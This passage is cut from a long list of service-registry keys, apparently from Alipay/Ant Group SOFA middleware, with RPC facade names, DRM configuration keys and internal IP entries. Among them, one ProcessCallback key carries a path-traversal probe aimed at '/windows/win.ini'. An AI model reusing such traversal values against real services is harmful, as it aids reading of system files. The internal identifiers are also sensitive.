@#SOFA-HEALTHY","com.alipay.instdatalink.common.service.facade.datalink.MorseLocalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcenter.core.service.repository.TodoTaskCategoryRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.zpaas.facade.api.JiuzhouOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.cloudinc:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainScope,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finasmcore.common.service.facade.promo.service.PromoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_1225_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.routeclient.interfacename:forexprod#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ropcn.common.service.facade.api.RopTaskModifyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icfmng.common.service.facade.api.DailyArchiveApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.242.25#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.securitycap:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixRegex,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.revol.core.service.facade.ScriptChecker:1.0:cone_customertestyudian@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csshield.service.facade.api.DatasetServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ICONTROL#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifecustprod.common.service.facade.setting.SettingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antdataassets.facade.graph.InfoGraphFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.96.40#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.csivr.common.service.facade.api.OutcallCallRecordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PCBENEFITCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:robothelper@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbmarketcenter.common.service.facade.activity.service.ActivityAttendInfoSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:recruitcore_planContextAuditCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finslip.common.service.facade.recon.ReconBatchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscheck.service.facade.api.ModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:alipaymember_advertisementApprovalCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:publichome@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ASSETFLUXDECISION#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cinspfront.biz.service.impl.mobilegw.replay.RecordingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dockerlabapp:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.giftprod.common.service.facade.wufu.WufuServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FUNDBOSS#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmembermng.common.service.facade.inviteconfig.service.InviteLinkService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.importrecord.facade.ImportRecordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuemaprod.common.facade.service.ContentFeatureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.196.56#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_DRAGONX#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@minipcodemarket#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.fc.custcenterprod.facade.AcquireFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.ops.OpsCacheOperatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_ACRMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.52.88.141#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.antgroup.zmxy.zmcustcore.common.service.facade.api.ArchiveProdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemsgprod.common.service.facade.admin.template.LifeMsgSceneConfigAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.amberdata.metadata.service.BusinessSceneService:1.0:businessSceneService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.questionnaire.QuestionnairePermissionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.SystemParameterQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:mappprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmerchantprod.common.service.workorder.api.InsWorkorderOperatorConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insrenewprod.common.service.facade.api.continuous.InsContinuousFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.etetestcore.etetestcoreDataSource.groupLabelMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.Arch:name=com.alipay.securitycore.common.service.view.policy.drm.resource.CommonServiceViewConfigureResource.templateRootPath,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.prodmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.koubei.kbposprod.common.service.facade.api.TaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.193.141#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.paramcore.common.service.manage.facade.api.internal.ParmTrunkDirectlyConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aldecisionguard.facade.BizDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.hqlc.service.HqlcAssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbalgocenter.common.service.facade.api.itemquality.ItemQualityAlgoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlogmng.common.service.facade.spm.SpmApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antpim.common.service.facade.chain.ChainOverviewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_CARDINFO#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ctu.analysis.spi.RopcnOpenRiskTaskAnalyzeService:1.0:ropcn@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.community.drm.CommunityDrm.questionAnsweredCardMaxAnswerCountThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finbatch:name=com.alipay.finbatch.biz.service.impl.drm.FinbatchCommonDRM.unlockTimeoutSerialByCondition,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.riskbizus.common.service.integration.tools.hbase.ZdalHbaseClientManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBack:1.0:mobile_payment_saas@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insofflineinvest.common.service.facade.service.HospitalQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.LoanRepayConfigDrm.execDeductCmdMaxDelayMinute,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ipsponsorprod.biz.mservice.digital.rpc.DigitalActivityRpc:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.HealthVoucherPrizeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointprod.common.service.dispatch.api.AopPointdispatchService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinsight.service.api.explorer.QueryAnalysisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.26.191#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pointcore.common.mpoint.facade.MpointDaySummaryQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.page.PageQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:dchainprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finadvisorprod.common.service.facade.mng.StrategyRecommendQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudprovision:name=com.alipay.cloudprovision.conf.requestconfig.scanIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.diag.common.service.facade.MetadataFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDowngradeDrmImpl.starWishCompleteDowngrade,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secuinfos.common.service.facade.api.SecumngNewsSecuritiesFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitestcenter.common.service.facade.qualityviz.OnlineBugFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlecore.service.config.manager.action.BankcodeConfigService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fraudmng.common.service.facade.variable.VariableQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:insmarketingbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatacontextTBaseCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsCrowdManager.loadTestAllCrowdStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.meshyorg.common.service.facade.spi.AssetsProcessSpiFacade:1.0:cardAssetsProcessSpiFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.185#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchmembercore.common.facade.MemberProductDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscommunity.common.service.facade.CommonTopicFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.airprodTairCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbdelivery.common.service.facade.api.DeliveryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.cif.client.drm.TairToTbaseSwitch.fullAccessToTbase,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.AntVipDefaultAppName:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antcloud.acbsbcore.common.service.facade.BsbGenericConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.msgbroker-tutorial:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.accordercore.fundsche.api.PartnerPlanManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mobilecashier:name=com.alipay.common.datacollector.rule.internal.DataModelRuleCoordinator.dataCollectWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.enableDebug,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.opinioncore:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dt.dataphin.datasecurity.interfaces.facade.api.tenant.SecurityTenantService:1.0:datasecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insttrade.common.service.facade.api.BizProcessServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.common.service.facade.api.hbase.CommonKeyValueQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ofpgrowth.common.manage.facade.api.DarwinManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.145.85#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.hyp.core.api.HyCheckTaskRunService:1.0:EC-ar-generate-sign-task@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.facade.standard.api.product.ProductQueryStdFacade:1.0:PDCORE_ANTGW2CN_FOR_ZP@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.salary.SettleAccountsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.PersonCertifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csrobot.service.facade.mng.api.ChatAnswerMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_${app_domain}_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.tradeapcore:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antmember.common.service.facade.invite.InviteConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.constraintNewMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dt.onedata.dwm.client.table.SummaryCatalogOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antcloud.ifcidentitycloud.common.service.facade.mic.zproxy.SecurityProductQueryZpFacade:1.0:ifcidentitycloudus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileapp.common.service.facade.login.TemporaryLoginFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalParamDrm.tairConcurrntTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opencore.service.facade.pub.PublicAppManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.app.AppApiManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.RecoverService:1.0:supergw.d9721.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecoqltprod.core.service.eco.EcoTinyappPageDetectDetailDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pickup.ide.D2C:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iaccorder.service.facade.api.AccountExchangeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:creditgovernance_default_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.iriskservice.common.service.model.probe.spi.FillerPluginProbeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alibaba.dataphin.development.common.facade.api.StreamBatchMappingJobApi:1.0:dpstreaming@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.zpaas.zappinfo.facade.query.AppConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.developerops.facade.api.SnapshotManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmopenapi.service.facade.AuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.0.110#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cifcommon.business.platform.useragreement.facade.UserAgreementRzoneQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bbcmng.immunemng.facade.ImmAllSolutionFacade:1.0:pcreditcheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbschedules.common.serivce.facade.ScheduleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.depcore.service.facade.query.DepositTransferQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.mwalletmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.jdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:insendorseprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.shared.feature.template.DetectItem:1.0:instantSensitiveInfoDetectItem@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.SystemTaskManager:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mmtcaftscmdproc.common.service.facade.ConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dmeta.facade.virtualcanvas.DmetaVirtualCanvasRelationWriteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discount.common.service.facade.plan.PlanSignRecordService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkdepmng.common.platform.facade.rpa.AutoAccountInstructionsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cstraining.common.service.facade.training.api.CstTrainingControlService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dasbi.daas.api.report.ReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.feeclcn.common.service.facade.RefundConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencyEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitydata:name=com.alipay.securitydata.common.service.velocity.opssla.VelocityPubConfigResource.fraudmng.${service_mode}.pubVelocity,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ipay.data.ifdasset.facade.exchangerate.IfdaExchangeRateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:finriskmngcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_Q_QUALITY_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.finpwm.aip.fixedmigrate.FixedMigrateConfigDrm.fpaMigratingUserIdFlags,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeexprod:name=com.alipay.cif.drm.PasswordRevokeSwitch.queryPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zcache:name=com.alipay.zdal.ldc.tair.customerTairCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.253.25#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.187.55#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insapportion.common.service.facade.PublicityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/..��..��..��..��..��..��..��..��/windows/win.ini@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.144.48#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.mydds:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_MRCHEXTERNAL#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.dds.zdal.interfaces.endpoint.facade.rest.api.APIDbkeyMappingFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insclaimdecision.common.service.assist.InsClaimOnlineBiQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.common.AssetRolePermissionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.stocksupervise.common.service.facade.StockToolsProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bbcmng.immunemng.facade.ImmTrCheckFacade:1.0:pcreditcheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.RecoverService:1.0:supergw.p78.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:nearbyshopbase@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlogmng.common.service.facade.gateway.TLogMetaConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.SchedulePointFacade:1.0:opscloudflow@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:certify@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitoptrade.api.TradeModelQueryFacade:1.0:tradeModelQueryFacade@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sre.cloudpaychecker.facade.account.BillChannelOutQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.opencore.service.facade.app.AppEventSubscribeManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_MOBILEBC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mfinbaseprod.common.service.facade.api.FinFundCompanyManagerSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_CR_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.opinioncore:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.slaConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.criskcenter.common.service.facade.strategycore.StrategyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.certdoc.certdoccenter.facade.UserCertDocBizService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ordermng.common.service.api.order.OrderProtocolConfirmService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.service.facade.NotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.point.api.PttransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.140.120#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbinventorycenter.common.service.facade.api.InventoryManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.service.facade.microapp.DingTalkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jarvis.service.facade.api.user.HrMasterDataManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.AssetTaobaoItemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findatacanal.common.service.manage.gildata.GdMfNottextannouncementSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_QINYUE_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.securitycap:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.injectClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.collectLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securityexprod.biz.alipayauth.service.AlipayAuthSecurityLoginService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstprod.common.service.mobile.api.fund.BalanceDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininfo.common.service.facade.info.InfoCallService:1.0:bankprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.zskynet.integration.drm.AlarmCheckDRM.administrator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dk.common.service.facade.monitor.TaskPriorityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.qaZQueue25#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.cpmMonitCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.zoloz.zim.common.service.facade.business.api.BizIdentityFacade:1.0:bis@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.core.common.facade.CacheQuery